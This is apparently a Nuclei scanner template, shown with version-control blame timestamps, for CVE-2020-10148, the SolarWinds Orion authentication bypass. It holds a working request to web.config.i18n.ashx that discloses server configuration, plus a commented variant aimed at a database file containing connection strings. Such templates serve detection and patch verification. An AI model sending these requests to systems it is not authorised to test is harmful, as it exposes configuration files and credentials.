2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-10148
|
2020-12-29 07:32:08 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA)
|
|
|
|
author: dwisiswant0
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: critical
|
2020-12-29 07:32:08 +00:00
|
|
|
description: |
|
|
|
|
This template could allow to bypass authentication and execute API
|
|
|
|
commands which may result in a compromise of the SolarWinds instance.
|
2021-08-19 13:15:35 +00:00
|
|
|
reference:
|
|
|
|
- https://kb.cert.org/vuls/id/843464
|
|
|
|
- https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml
|
|
|
|
- https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965
|
|
|
|
- https://twitter.com/0xsha/status/1343800953946787847
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2020,solarwinds,rce
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.80
|
|
|
|
cve-id: CVE-2020-10148
|
|
|
|
cwe-id: CWE-287
|
2020-12-29 07:32:08 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-01-01 10:40:35 +00:00
|
|
|
- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
|
2021-03-11 16:14:39 +00:00
|
|
|
# - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
|
|
|
|
# Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.
|
2020-12-29 07:32:08 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2020-12-31 08:51:24 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "SolarWinds.Orion.Core."
|
2021-03-11 16:14:39 +00:00
|
|
|
# - "Connection String" # Commented matchers can be used for "SWNetPerfMon.db" file.
|
2021-01-01 11:33:22 +00:00
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-01-01 10:38:09 +00:00
|
|
|
- "text/plain"
|
2021-01-01 11:33:22 +00:00
|
|
|
part: header
|
2021-01-01 10:38:09 +00:00
|
|
|
|
2020-12-29 07:32:08 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
2021-03-11 16:14:39 +00:00
|
|
|
- 200
|